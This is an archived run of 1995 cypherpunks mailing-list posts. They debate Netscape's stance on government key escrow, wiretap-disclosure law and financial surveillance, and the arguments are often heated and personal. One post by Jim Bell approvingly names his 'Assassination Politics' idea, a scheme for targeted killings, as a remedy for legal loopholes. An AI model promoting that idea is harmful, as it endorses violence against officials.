From: j.miranda3@genie.com
Date: Sun, 3 Dec 95 14:38:47 PST
To: cypherpunks@toad.com
Subject: info?
Message-ID: <199512032235.AA089570133@relay1.geis.com>
MIME-Version: 1.0
Content-Type: text/plain


Can you send me information about your organization?

 --Joseph Miranda




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Sun, 3 Dec 95 19:34:19 PST
To: rmarquis@umich.edu (Robert Marquis, Jr.)
Subject: Re: Questions
In-Reply-To: <v01530502ace7ad85c8de@[198.109.36.28]>
Message-ID: <199512040338.WAA24230@homeport.org>
MIME-Version: 1.0
Content-Type: text


All of these questions are answered in Bruce Schneier's excellent
book, Applied Cryptography, as well as in the sci.crypt FAQ and other
places.  Please take a look.

| I was wondering if anyone would be able to help me out.  I am writing a
| research paper and I need some interviews for it.  If you could answer any
| of these questions about security, I would greatly appreciate it.  Thanks
| for your time.
| 
| --Bob Marquis
| 
| Please send responses to rmarquis@umich.edu
| 
| 
| - How can PGP help secure something like e-mail?
| 
| - Are there any encryption schemes which are "unbreakable"?
| 
| - What would someone need to do to send an e-mail message which cannot be
| read or altered by anyone else, or is it not possible?
| 

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Sun, 3 Dec 95 19:47:00 PST
To: nobody@REPLAY.COM (Anonymous)
Subject: NOISE for Anon-sam
In-Reply-To: <199512040235.DAA29635@utopia.hacktic.nl>
Message-ID: <199512040344.WAA00492@nrk.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Salsa Sam
Salsa:
One of the disadvantages of a anon. address is there is no
non-"NOISY" way to ask you to...
	Please break your lines to rational lengths!

We now return you to the flame war in progress...


-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: OpsAn@gnn.com (Michael Coates)
Date: Sun, 3 Dec 95 22:51:23 PST
To: cypherpunks@toad.com
Subject: AOL DROPS RESTRICTION ON WORD "BREAST"
Message-ID: <199512040651.BAA17397@mail-e1a.gnn.com>
MIME-Version: 1.0
Content-Type: text/plain


More Common Sense?

AOL DROPS RESTRICTION ON WORD "BREAST"
America Online, which has been making efforts to police its own service by
purging obscene or vulgar expressions deemed to be offensive, has changed
its mind about the word "breast" and reinstated it as an acceptable term of
discussion.  A contributor to a breast cancer bulletin board had called the
purging of the word breast "outrageous and potentially life-threatening."
(Atlanta Journal-Constitution 2 Dec 95 F7)








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jimbell@pacifier.com (jim bell)
Date: Sun, 3 Dec 95 23:11:00 PST
To: cypherpunks@toad.com
Subject: Re: "Got a subpoena?"
Message-ID: <m0tMUkO-000950C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


>On Sat, 2 Dec 1995, jim bell wrote:
>
>> >On Thu, 30 Nov 1995, sameer wrote:
>> >
>> >> > 
>> >> > What about a court order to (a) start comprehensive logging, and (b) not
>> >> > tell anyone under penalty of ______ .
>> >
>> >I am unaware of any authority for such an order.
>> >> 
>> >> 	Aren't court orders part of the public record? I don't quite
>> >
>> >Yes, but court orders can be sealed pending further order of the court.
>> 
>> Okay, maybe with your qualifications you can answer this.  It has always
>> mystified me why "the authorities" think they can engage in wiretapping
>> without informing the person wiretapped that this has occurred, despite the
>> fact that there was apparently never any precedent for this practice before
>> the "wiretap era."
>
>Because Congress passed the Electronic Communications Privacy Act which 
>is codified, as amended, at 18 U.S.C. Section 2510 et seq.  Section 
>2511(2)(a)(ii) states in part:  "Notwithstanding any other law, providers 
>of wire or electronic communication service ... are authorized 

"are authorized"?  You mean, NOT REQUIRED, but merely "authorized"?  

In any case, this doesn't explain why this is CONSTITUTIONAL.   I hope you understand the difference.

>to provide 
>information, facilities, or technical assistance to persons authorized by 
>law to intercept wire, oral, or electronic communications ... if such 
>provider ... has been provided with [a court order or a certification by 
>an appropriate official that a court order isn't required ...].

I realize that a phone company might not normally be expected to refuse to cooperate, but the way the thing above is written, they are merely "authorized" to do something, they are not required to do it.

 
>> In addition, I would like to be able to figure out a method to allow the
>> de-facto disclosure of such activities, and to in fact force the phone
>> company to do so, if they are asked to tap my or anyone else's phone.  It
>> occurred to me that even if there was a prohibition on explicitly revealing
>> that such a tap exists, it should be possible to require the telephone
>> company to certify that no tap exists, and to require that this
>> certification will be followed by an explicit and immediate de-certification
>> message the moment the phone company is unable to maintain such
>> certification.  The receipt of such a letter/fax/email will indicate that a
>> tap has been placed, despite the fact that it will not say so.
>
>Sorry.  
>
>In subsection B of the the statute I quoted above, it states in 
>part:  "No provider of wire or electronic communication service ... shall 
>disclose the existence of any interception ... with respect to which the 
>person has been furnished a court order or certification ... except as 
>may be otherwise required by legal process and then only after prior 
>notification to the Attorney General or ....  Any such disclosure shall 
>render such person liable for the civil damages provided for in section 
>2520. 

Sorry, I don't think that's a satisfactory answer.  First,  it would presumably be possible to disclose the WIRETAP ORDER without explicitly disclosing the existence of the "interception" as stated above.  Admittedly it would amount to the same thing from the standpoint of the person wiretapped, but as far as I can see it would not LEGALLY be the same thing.  The letter from the phone company will state:

"We have received a wiretap order from the court listed below.  We have not YET acted on that order.  We are not disclosing the existence of any interception, and we cannot legally do that.  You are forewarned!"

Or, more coyly:

"Normally, we can reassure customers that their telephone lines are not being wiretapped by the police.  However, during the period of January 15, 1996 through January 30, 1996 we can no longer give you that assurance.  Please take care during this period."

Note that I am assuming the willingness of the phoneco to be UNCOOPERATIVE, at least according to "the spirit of the rules."  They could still cooperate according to the LETTER of the law.


> No cause of action shall lie against in any court against any 
>provider ... for providing information ... in accordance with the terms 
>of a court order or certification under this chapter." 
>
>Thus providing evidence of that one of the uses of lawyers is to [attempt 
>to close loopholes.

Which is an excellent reason for implementing my idea, "Assassination Politics."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blancw@accessone.com
Date: Sun, 3 Dec 95 23:02:45 PST
To: unicorn@schloss.li
Subject: Re: GAK Flap Happening at a Good Time--Journalists Read!
Message-ID: <9512040703.AA14762@pulm1.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain



Uni, if you're so overwhelmingly and absolutely incensed with Netscape, why 
don't you write to Jim Clark yourself and tell him about his spinelessness and 
all your other opinions of him, his unaccceptable attitude, and his worthless 
company, instead of getting granular with Jim and Dan here on the list?

After all, Jim Clark is the one who made the unpleasant statements.

  ..
Blanc





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Sun, 3 Dec 95 23:10:33 PST
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: Info on Netscape's key escrow position
In-Reply-To: <199512040700.XAA14434@blob.best.net>
Message-ID: <30C29DD1.46CB@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


> > The whole point of our anti-GAK position is that
> > government mandated key escrow is bad.
> 
> "Our" anti-GAK position.
> 
> I would like to hear Jim Clark say "GAK is bad".


James A. Donald wrote:
> > The whole point of our anti-GAK position is that
> > government mandated key escrow is bad.
> 
> "Our" anti-GAK position.

  Sorry, I was referring to the official Netscape company position, not
the personal position of either myself or Jim Clark.

> I would like to hear Jim Clark say "GAK is bad".

  So would I.  I don't know if he will take such a position or not.
I do believe that the company, Netscape, will take such a position
in the coming week.

> I would also like to hear him, and you, refrain from using the phrase
> "key escrow" and instead use the phrase "Government Access to Keys".

  I've been trying to use either GAK, or "mandatory key escrow" to
refer to the hated beast.  If I've used just "key escrow" in that
context, I'm sorry.  I've been trying to use the term "key escrow"
for cases when it is not mandatory.

> I draw your attention to the fact that Bill Gates did not use the
> intentionally misleading phrase "key escrow" in his book.

  I haven't read his book.  Did he take a position against GAK?  Did
he say that if GAK is required by law his company would or would not
implement it?  A summary of his comments on this topic would be
informative.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sun, 3 Dec 95 23:20:36 PST
To: jimbell@pacifier.com (jim bell)
Subject: Re: "Got a subpoena?"
In-Reply-To: <m0tMUkO-000950C@pacifier.com>
Message-ID: <199512040715.XAA07095@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Note that I am assuming the willingness of the phoneco to be UNCOOPERATIVE, at least according to "the spirit of the rules."  They could still cooperate according to the LETTER of the law.

	It's in the phone company's best interest to be cooperative.
*but* in the case of, say, an internet privacy provider, it is in the
provider's best interest to be uncooperative.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Beavis B. Thoopit" <beavis@bioanalytical.com>
Date: Sun, 3 Dec 95 20:21:38 PST
To: jsw@netscape.com (Jeff Weinstein)
Subject: Re: Do The Right Thing, Netscape GAK
In-Reply-To: <30C1660F.47EA@netscape.com>
Message-ID: <199512040420.XAA01277@bioanalytical.com>
MIME-Version: 1.0
Content-Type: text/plain


among other words Jeff W. wrote...
>   I don't think you will ever be in this position.  If we are forced implement
> GAK by the government, everyone else will too.

This comment is somewhat offensive to me.  I disagree.  In fact, it
is a pretty whiny sounding and spineless statement.  Jeff, you are not
making _me_ feel any better about Jim's comments!

Kudos to Hal for his clear rebuttal and adherence to facts.
Kudos to Tim for "Do The Right Thing".

I will add that my belief is that GAK will not be the profitable way
to go.  I share in Duncan Frissell's optimism that we are now too far
down the road.

Tim has claimed that browsers are a "no loyalty" product.  I will take
this a step further and go on record saying that a GAK'd browser will
be an economic loser.  It may sell a couple of contracts, but it will
never gain widespread acceptance.

Look at recent history on the net.  It is the net leaders who are
making the future happen.  Netscape is (was?) the epitomy of this
new phenomenon.  If I were running a business, I would attempt to
fulfill cypherpunk-like requirements rather than trying to build
a "government approved" product.  Let's watch sameer...

Doing the "right thing" will end up being the "profitable thing".

Maybe I'm blue sky, but it is nice to base decisions on principle...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@mbcl.rutgers.edu>
Date: Sun, 3 Dec 95 20:22:25 PST
To: jsw@netscape.com
Subject: Re: Info on Netscape's key escrow position
Message-ID: <01HYDZM9D75S9QUS9W@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"jsw@netscape.com"  "Jeff Weinstein"  2-DEC-1995 19:58:15.80

E. ALLEN SMITH wrote:
>         I believe that the central question at hand is whether Netscape will
> incorporate mandatory GAK into any of its products if you have an economic
> (governmental purchase) rather than physical (governmental threat of violence)
> reason to do so. I would hope that the upcoming statement will clarify this
> position, and in the proper direction.

  If the government wants to purchase software for its own use that implements
key escrow, why it that bad?  The whole point of our anti-GAK position is that
government mandated key escrow is bad.  If individuals, companies, or government
agencies want to escrow their own keys, with the escrow agents of their own
choosing, I have not problem.  Its only when the government make the escrow
and the agent mandatory that I've got a problem.
--------------------
	I apologize for my lack of clarity. I would agree with you on voluntary
escrow. My meaning in "governmental purchase" is that governments may use
tactics such as directing purchases to companies that cooperate with their
agenda. In other words, instead of properly spending the taxpayers' money on
the best browser, server, etcetera available, they may exclude programs
produced by a company not incorporating mandatory GAK.
--------------------

  I don't believe that Netscape will ship a product that mandates GAK
unless it was required by law to do so.  As long as it is legal to sell
non-escrowed crypto products in this country or elsewhere, I think we
will keep doing it, because that is what our customers want.
--------------------
	I am glad that your information leads you to this belief. However, I
would still prefer that the official company statement include a clear section
on this matter. (I would also, of course, prefer that this section be
clearly against GAK; Jim Clark's claim that there are any circumstances under
which a private citizen's communications should be tapped gives me cause to
doubt.)
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: djw@pdcorp.com (Dan Weinstein)
Date: Sun, 3 Dec 95 16:14:31 PST
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: GAK Flap Happening at a Good Time--Journalists Read!
In-Reply-To: <Pine.SUN.3.91.951203060612.24122C-100000@polaris.mindport.net>
Message-ID: <30c23e97.16338172@email.pdcorp.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 3 Dec 1995 06:20:52 -0500 (EST), you wrote:

>On Sun, 3 Dec 1995, Dan Weinstein wrote:
>
>> On Sat, 2 Dec 1995 20:16:08 -0500 (EST), Black Unicorn
>> <unicorn@schloss.li> wrote:
>> 
>> >On Sat, 2 Dec 1995, Jeff Weinstein wrote:
>> >
>> >> Black Unicorn wrote:
>
>> >> > To the outsider, it looks as if Netscape 'owes' the government.
>> >> 
>> >>   We do owe the government.  They have paid us for Servers and Clients
>> >> that support Fortezza.  That is what we owe them.  The money that the
>> >> NSA gave us for Fortezza is not very significant compared to what we
>> >> are getting from commercial sources.
>> >
>> >Obviously it was significant enough to take.  It was also a perfect 
>> >opportunity for Netscape to express concerns about the future of the 
>> >technology, which is in netscape's interest.  The astute deal maker would 
>> >be happy to work with the NSA on his own terms.  Instead, it 
>> >would appear that Netscape is working FOR NSA on their terms.
>> 
>> If you read what they had to say about this, you know that they are
>> hoping others will create non-escrowed crypto hardware using the same
>> interface.  I see no reason for them to not include support for any
>> available hardware system (even if it includes GAK), as long as they
>> continue to support non-escrowed encryption internally.  This allows
>> the customer to decide that they have no problem with GAK and use the
>> external system, or use the internal system and not have GAK.
>
>I read it quite carefully.  I just was not as easily taken in by the 
>double speak as you were.

I see, you cannot say that they are really supporting GAK based upon
the actual statements made, so you simply assert it.

>Hoping others will do something is about as useful as sitting on your thumb.

Yes, but making something an economically viable venture is very
useful.  That is what they have done.  They have implemented an
interface into a widely available piece of software.  This makes it
much more economically viable for others to implement strong crypto
into another product using the same interface.

>Netscape is in a position to make some policy impact here.  If they 
>insist on going another way, I want to hear why, not that they are all on 
>our side and we should be nice because really we're all in this together, 
>and afterall, Netscape isn't such a bad lot.

Jeff Weinstein has said that Netscape is drafting an official position
paper and that it would be available in the near future.  If Netscape
lives up to this, we will soon enough have the companies position and
not just that of two employees (Jeff Weinstein and Jim Clark).  Why do
you feel you must jump to judge the company based on the opinions of
two of its employees?  This is especially questionable when one is
clearly stating that the company is against GAK and the other is at
worst being unclear.  If you feel they are being contradictory, wait a
week and look at their policy statement then decide.

>They can support whoever they like.  I just want to hear WHY.  More 
>importantly, I don't want to be snowed with some horse hockey answer.  It 
>insults my intelligence.  Yours was obviously unaffected.

Wait a week and read their official statement then decide.  You accuse
me of logical fallacies, but then argue through insult and assertion.
You have not pointed to a single fact or any contradictory statements
in posts to this list.  I will admit that Jim Clark was somewhat
unclear, but I attribute this to the fact that the official company
position is as yet not written and thus he is attempting to remain
somewhat neutral.

>> >I'd be interested to know what a 'government liason person' is.  It 
>> >sounds to me like an 'in house lobbist.'  There is an old joke in the 
>> >beltway about in house lobbists.
>> >
>> >I also would like to know why you are actively lobbying for 
>> >'claification' rather than 'modification' of the current policy.
>> 
>> Until the current policy is clearly defined it is like a moving
>> target.  Once the government has been pinned down to a single policy,
>> it will be much easier to dispute their policies.  Currently the
>> government can say anything they want about their enforcement of ITAR,
>> because they have not stated a clear set of rules with regard to it.
>> Once they have set clear rules, those rules can be shown to be overly
>> restrictive or even unenforceable.
>
>I believe you actually think you are teaching me something here.

You asked why they wanted clarification and I simply responded.

>I said before, and I will say again.  If Netscape is against GAK, then 
>let them be AGAINST GAK.  If they are just going to try and finesse their 
>way into the market without making to many waves, let's hear it that way 
>instead of some crap about how they are 'lobbying actively against GAK' 
>(Which I might point out, is an assertion that fell apart at the most 
>basic prodding).

Wait a week.  As far as their lobbying assertion falling apart, I must
have missed this.  My understanding is that:

A)  They support several industry groups that are taking an active
position in opposition to GAK.

B)  They have until very recently had only very limited resources.

C)  Have just recently hired an in house lobbyist.

D)  That they did not attend the Bernstein hearing.

Now given point B, I see no reason to expect that they would in the
past have done much more than they have.  Given point C, I see they
are currently expanding their lobbying.  If point D is the measure of
crypto correctness, then I to am guilty.  Though I do not live in the
vicinity, I guess I should have been expected to fly up to lend my
moral support.  Bovine excrement.

>> Also, lawyers usually advise clients based on a worst case scenario,
>> thus when the government is unclear on its rules, the lawyers advise
>> their clients based upon the worst possible interpretation of the law.
>> This is done to protect their client.  By not stating a policy, the
>> government is making that worst case happen, without having to be the
>> bad guy by actually attempting to enforce such a policy.
>
>I really think you are pompus enough to think you are teaching people 
>things they don't know here.

Again, you asked, I answered.  I did not expect that this would be new
to anyone on the list, but you asked.

>I invite you to re-read the entire conversation and discover, as an 
>exercise, that the issue is not what the government is or is not doing, 
>but what netscape is or is not doing.  I could care about Netscape's 
>loose-lipped lawyers.

You seem very concerned about what Netscape is doing, and as such
should be concerned about what their lawyers are _forced_ to tell
them.  I understand that the discussion is about Netscape not the
government, but discussing actions without discussing motives is
useless.

>> >
>> >Netscape seems to be taking the position, "We'd love it if you'd let us 
>> >do X, but we are happy to roll over for whatever."  and  "By the way, 
>> >what is the rule on exporting software again?"
>> >
>> >I am impressed that some effort is being made.  I think it in the form of 
>> >'too little, too late.'  But hey, who am I?
>> 
>> I think you are being too critical, they have done more than any
>> company I know of to make easy to use crypto widely available.
>
>0 + .00001 = .00001
>
>Yes, just as last time you checked, .00001 is still more than 0.

My point is that you are too quick to call your recent ally an enemy.
You may not see what Netscape has done as important, but I believe
that many do (including me).  They are supposed to have integrated
e-mail crypto in the final release of Navigator 2.0.  I will remind
you that Jeff Weinstein has said that this will not include GAK.

>> They
>> may be willing to obey the laws if they require GAK, but I do not feel
>> that they are just rolling over either.  I strongly oppose GAK, but I
>> do not believe that no crypto is better than GAK crypto.  I would
>> rather keep some people out than nobody out.
>
>Your ignorance is assuming that the options you present are the only 
>options available.  JW made the same mistake.  In logical discourse this 
>is called "narrowing the field."  It's a version of the 'straw man' 
>and a classic flaw in logical argument.

I am not saying that the choice is between either no crypto or GAK
crypto.  I am saying that they have only said that they will go to GAK
if the choice is between GAK crypto and no crypto.  To the best of my
knowledge they have not said that they would implement a GAK only
product in any other situation.  I think that this is reasonable, I do
not think that we should let it come to this.  We need to insure that
they (or anyone else) are never put into that position.  (and yes they
should to.)

>> Dan Weinstein
>> djw@pdcorp.com
>> http://www.earthlink.net/~danjw
>> PGP public key is available from my Home Page.
>> All opinions expressed above are mine.
>> 
>> "I understand by 'freedom of Spirit' something quite definite -
>> the unconditional will to say No, where it is dangerous to say
>> No.    
>
>This has got to be the most ironic of signatures I have ever seen.
>
>Why don't you begin to apply the cute quotes you put in your .sig to real 
>life and tell Netscape to grow a backbone and say 'No.' to GAK?

I sent a message to Netscape after reading the article that started
this,  It simply stated that I wanted clarification on their position
on GAK and that if they were to support it they would lose a loyal
customer.  I have since been convinced by Jeff Weinstein's posts to
this list that the company does not support GAK, and in fact they
oppose it.  You would do better to spend less time insulting people
and more time trying to support your arguments.


Dan Weinstein
djw@pdcorp.com
http://www.earthlink.net/~danjw
PGP public key is available from my Home Page.
All opinions expressed above are mine.

"I understand by 'freedom of Spirit' something quite definite -
the unconditional will to say No, where it is dangerous to say
No.        
           Friedrich Nietzsche






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Sun, 3 Dec 95 21:40:17 PST
To: cypherpunks@toad.com
Subject: No Privacy Right in the Americas ?
Message-ID: <Pine.BSD.3.91.951204003918.13763D-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
Friend, 
 
 
A 12 02 95 Bloomberg newsstory is headlined: 
 
     Latin American nations will help U.S. combat 
                 money laundering 
 
 
The newsstory's datelined: 
 
       BUENOS AIRES (Dec 2, 1995 - 16:38 EST) 
 
 
It reports: 
 
   A communique issued after a two-day meeting of ministers 
   and anti-drug officials from throughout the Americas said 
   countries had agreed to...establish systems to identify 
   transfers and deposits that could be linked to illegal 
   activities. 
 
 
Please note: NOT transfers and deposits that 
 
                    are so linked 
 
but t & d's that 
  
                  COULD BE so linked, 
 
                        and 
 
                      seized ! 
 
 
Perhaps that's why US Treasury Secretary Robert Rubin exclaimed 
 
     ...this conference was an enormous step forward. 
 
 
In particular, 
 
   Countries in the region were encouraged to follow the U.S. 
   lead in setting up organizations which use computerized 
   technology to search data bases for suspicious transactions, 
   said Rubin. 
 
 
Such organizations can be distant, official organizations or 
they can be neighborhood, job-creating, community-aware, entre- 
preneurial blessings.  Anyway you like it ! 
 
One selling-point at the conference: 
 
   Crime organizations such as the Yakuza in Japan, the Col- 
   ombian drug cartels and the Italian mafia depend on money 
   laundering to place their gains beyond the reach of the 
   law.
 
 
Rubin summed up the point: 
 
       Profits that can't be spent aren't profits. 
 
 
He would have us believe he doesn't know where to shop. 
 
The illegals can spend profits on neighborhood troops, troops 
armed --one way or another-- by the world's most successful 
arms supplier. 
 
The advantage to that supplier?  It keeps 
 
    all 34 [minus 1] democratic governments in the region 
 
destabilized --amenable to penetration by money bags who know 
how to thrive in managed chaos-- ; and still dependent on arms 
from the "distant," official supplier. 
 
The advantage to the money bags?  It diverts "profits that 
can't be spent" from directly competing with them. 
 
The advantage to the illegals?  Neighborhood troops protect 
turf and provide inexpensive medical treatment for those with 
complaints. 
 
The advantage to the politicos?  Low intensity warfare keeps 
government troops busy doing something besides staging coups. 
 
Managed chaos?  Like the Buenos Aires conference which 
 
    ...emerged from [Clinton's] Summit of the Americas held 
    in Miami a year ago.
 
 
Right to privacy?  But of course.  From scheming in Miami to 
"profits that can't be spent" coverup in Buenos Aires to "we 
don't do that anymore" death squads in any of the 34. 
 
               "But I meant, for the people." 
 
               "You mean you have a complaint?" 
 
 
Cordially, 
 
Jim 
 
 
NOTE.  The Nando Times website URL is: 
 
             http://www.nando.net 
 
       The online filename of the above newsstory is: 
 
                biz634_2.html 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Sun, 3 Dec 95 15:55:48 PST
To: cypherpunks@toad.com
Subject: RE: Do the Right Thing
In-Reply-To: <61765.pfarrell@netcom.com>
Message-ID: <Pine.HPP.3.91.951204002623.24009A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 3 Dec 1995, Pat Farrell wrote:

> If the issue is just that people don't like the idea that the free,
> downloadable is GAK'd and that they have to pay $50 for a browser
> with strong crypto, please take your whining off list.

Thanks for the concern you are showing for the rest of the world.
What if the $50 outside the US will buy us a GAK'd client? We would
be much safer with 40 bits un-GAK'd than 64 bits GAK'd.

Mats




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 3 Dec 95 22:07:33 PST
To: Dan Weinstein <djw@pdcorp.com>
Subject: Re: GAK Flap Happening at a Good Time--Journalists Read!
In-Reply-To: <30c23e97.16338172@email.pdcorp.com>
Message-ID: <Pine.SUN.3.91.951204003416.22255A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 4 Dec 1995, Dan Weinstein wrote:

> On Sun, 3 Dec 1995 06:20:52 -0500 (EST), you wrote:
> 
> >On Sun, 3 Dec 1995, Dan Weinstein wrote:
> >
> >> On Sat, 2 Dec 1995 20:16:08 -0500 (EST), Black Unicorn
> >> <unicorn@schloss.li> wrote:
> >> 
> >> 
> >> If you read what they had to say about this, you know that they are
> >> hoping others will create non-escrowed crypto hardware using the same
> >> interface.  I see no reason for them to not include support for any
> >> available hardware system (even if it includes GAK), as long as they
> >> continue to support non-escrowed encryption internally.  This allows
> >> the customer to decide that they have no problem with GAK and use the
> >> external system, or use the internal system and not have GAK.
> >
> >I read it quite carefully.  I just was not as easily taken in by the 
> >double speak as you were.
> 
> I see, you cannot say that they are really supporting GAK based upon
> the actual statements made, so you simply assert it.

Again, you miss the point.  Again, you twist the issue.  I didn't say they 
were actively supporting GAK.  I said they were not opposing it with 
anything like vigor.

Show me now where I assert that "they are really supporting GAK."

I see.  You cannot say that I said that, so you simply assert it?

> 
> >Hoping others will do something is about as useful as sitting on your thumb.
> 
> Yes, but making something an economically viable venture is very
> useful.  That is what they have done.  They have implemented an
> interface into a widely available piece of software.  This makes it
> much more economically viable for others to implement strong crypto
> into another product using the same interface.

Uh... sure buddy.

Let's not forget something here.  Netscape is not removing itself from 
the role of crypto developer.  Quite the reverse.  They have purposefully 
included crypto in their product.  They claim to be for strong crypto.  I 
want to see more than words on that point.

When I said waiting for someone else to do something was useless, I was 
refering to Netscape's "allow others to oppose GAK actively while we do a 
lot of hand wringing" attitude.

> >Netscape is in a position to make some policy impact here.  If they 
> >insist on going another way, I want to hear why, not that they are all on 
> >our side and we should be nice because really we're all in this together, 
> >and afterall, Netscape isn't such a bad lot.
> 
> Jeff Weinstein has said that Netscape is drafting an official position
> paper and that it would be available in the near future.

You, unlike me, are willing to let that be enough.  I will believe it 
when I see it.

This basically amounts to "at some point in the 'near future' I will tell 
you what we will do in the 'near future after the near future.'"

  If Netscape
> lives up to this, we will soon enough have the companies position and
> not just that of two employees (Jeff Weinstein and Jim Clark).  Why do
> you feel you must jump to judge the company based on the opinions of
> two of its employees?

Why do you feel you must sit on your hands and wait for the world to 
decide your fate for you?

Mr. Weinstein and Mr. Clark (I would hope) have some infulence in these 
matters.  They have not (as far as I have seen) demonstrated to anyone 
that they have thought about them much.

What precisely is it about my free-speech urges and taunt to energize 
them that frightens you?

Am I too loud for your taste?

Does the frige humming at night disturb you?

  This is especially questionable when one is
> clearly stating that the company is against GAK and the other is at
> worst being unclear.  If you feel they are being contradictory, wait a
> week and look at their policy statement then decide.

I would much rather try to get them to write the damn policy statement 
right in the first place than have to try and CHANGE a poor and intrenched 
policy once in place.

Clearly you have not done much of this kind of work in business or 
government before.

> >They can support whoever they like.  I just want to hear WHY.  More 
> >importantly, I don't want to be snowed with some horse hockey answer.  It 
> >insults my intelligence.  Yours was obviously unaffected.
> 
> Wait a week and read their official statement then decide.

See above as to why this is foolish and lazy.

>  You accuse
> me of logical fallacies, but then argue through insult and assertion.

When the shoe fits....

> You have not pointed to a single fact or any contradictory statements
> in posts to this list.

Again, you have missed the target, and the barn.

I don't care about contradictory statements as much.  I care about a lack of 
demonstrated effort.  I have pointed to the absence of any single fact or 
statement that shows Netscape is really interested in trying to derail 
GAK, or promote strong crypto in anything like an active way.

  I will admit that Jim Clark was somewhat
> unclear, but I attribute this to the fact that the official company
> position is as yet not written and thus he is attempting to remain
> somewhat neutral.

And it is in my interest, and in my view everyone's interest, for him to 
be less than neutral, and instead quite violently pro-strong-crypto and 
anti-GAK.

It's called 'persuasion.'

> >> >I'd be interested to know what a 'government liason person' is.  It 
> >> >sounds to me like an 'in house lobbist.'  There is an old joke in the 
> >> >beltway about in house lobbists.
> >> >
> >> >I also would like to know why you are actively lobbying for 
> >> >'claification' rather than 'modification' of the current policy.

[Blah]

> >I believe you actually think you are teaching me something here.
> 
> You asked why they wanted clarification and I simply responded.

No, I asked why ONLY clarification, and NOT modification.  Try reading 
the entire sentence.

> >I said before, and I will say again.  If Netscape is against GAK, then 
> >let them be AGAINST GAK.  If they are just going to try and finesse their 
> >way into the market without making to many waves, let's hear it that way 
> >instead of some crap about how they are 'lobbying actively against GAK' 
> >(Which I might point out, is an assertion that fell apart at the most 
> >basic prodding).
> 
> Wait a week.

See above yet again why I would rather not.

> As far as their lobbying assertion falling apart, I must
> have missed this.  My understanding is that:
> 
> A)  They support several industry groups that are taking an active
> position in opposition to GAK.

"I'm all for those people who are for the troops in the gulf."

Lot of good this does.

> 
> B)  They have until very recently had only very limited resources.

My heart goes out.  Today they have resources, let's see some action.

> C)  Have just recently hired an in house lobbyist.

No, they have hired a 'government liason person.'  No one has explained 
with any detail what that means.

> D)  That they did not attend the Bernstein hearing.

Perhaps, perhaps not.  I have no idea.

> Now given point B, I see no reason to expect that they would in the
> past have done much more than they have.

Netscape has been nicely funded for quite a while in Washington business 
days.  A lot happens there in the time they have been loafing.

  Given point C, I see they
> are currently expanding their lobbying.

Uh... sure... and 0 + 1 is still only 1.

Show me some serious effort.  Name this expert lobbist who doubtlessly 
has a sparkling reputation.  Why was an individual and not a firm hired?

  If point D is the measure of
> crypto correctness, then I to am guilty.

Point D is of no real import to me.

  Though I do not live in the
> vicinity, I guess I should have been expected to fly up to lend my
> moral support.  Bovine excrement.

So.  We have one guy in washington, (maybe, is he posted in washington?) 
and a lot of excuses.

Adds up to:

"Bovine excrement."

> >> Also, lawyers usually advise clients based on a worst case scenario,

[Yadda yadda yadda]

> >I really think you are pompus enough to think you are teaching people 
> >things they don't know here.
> 
> Again, you asked, I answered.  I did not expect that this would be new
> to anyone on the list, but you asked.

I think you need to read questions more carefully.

> >I invite you to re-read the entire conversation and discover, as an 
> >exercise, that the issue is not what the government is or is not doing, 
> >but what netscape is or is not doing.  I could care about Netscape's 
> >loose-lipped lawyers.
> 
> You seem very concerned about what Netscape is doing, and as such
> should be concerned about what their lawyers are _forced_ to tell
> them.

I am more concerned about what Netscape is NOT doing.  How this has 
anything to do with what the lawyers (none of whom to my knowledge are 
lobbists) think?

> I understand that the discussion is about Netscape not the
> government, but discussing actions without discussing motives is
> useless.

A cute speech.  Still doesn't change the fact that a little fluff seems 
to have quite effectively taken you in.

> >> >
> >> >Netscape seems to be taking the position, "We'd love it if you'd let us 
> >> >do X, but we are happy to roll over for whatever."  and  "By the way, 
